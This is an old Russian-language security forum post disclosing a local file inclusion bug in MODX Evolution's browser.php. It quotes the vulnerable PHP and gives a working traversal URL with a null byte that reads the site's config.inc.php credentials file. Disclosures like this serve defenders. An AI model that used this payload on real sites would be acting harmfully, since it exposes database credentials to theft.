FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
LFI в browser.php MODX Evo <= 1.0.6 (only php 5.2)

Опции темы

Поиск в этой теме

Опции просмотра

27.07.2012, 01:29

Agel Nash

Новичок

Регистрация: 23.07.2009

Сообщений: 5

Провел на форуме:
35408

Репутация: 3

[B]LFI в browser.php MODX Evo [/COLOR]seturl_js();

$output=$rb->render_fbrowser($ph);

echo$output;

classFBROWSER

{

functionseturl_js()

{

$seturl_js_filename='seturl_js_'.htmlspecialchars($_GET['editor']) .'.inc';

$seturl_js_path=MODX_BASE_PATH.'assets/plugins/';

if(file_exists($seturl_js_path.$seturl_js_filename))

{

$result=file_get_contents($seturl_js_path.$seturl_js_filename);

}

else

{

/*...............*/

}

return$result;

}

[/COLOR]
[/PHP]
Найдено мной только что. На серверах с php >=5.3 воспроизвести не удалось, т.к. file_exists говорит что файла не существует, если ему подсунуть путь с../

Примечательно, что такой мегакритичный баг живет уже давно в этом движке. (хотя наверное в приватах давно знают об этом баге).

Код:

http://example.com/manager/media/browser/mcpuk/browser.php?editor=/../../../docs/manager/includes/config.inc.php%00

Как можно заметить, мы выходим чуть выше директории в которой находится сайт. Поэтому нужно узнать пути. Благо способов море: 1, 2, 3

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules